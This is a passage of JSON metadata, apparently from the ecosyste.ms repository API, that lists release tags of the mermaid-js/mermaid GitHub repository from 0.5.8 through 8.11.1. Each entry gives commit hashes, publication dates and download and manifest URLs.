"dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"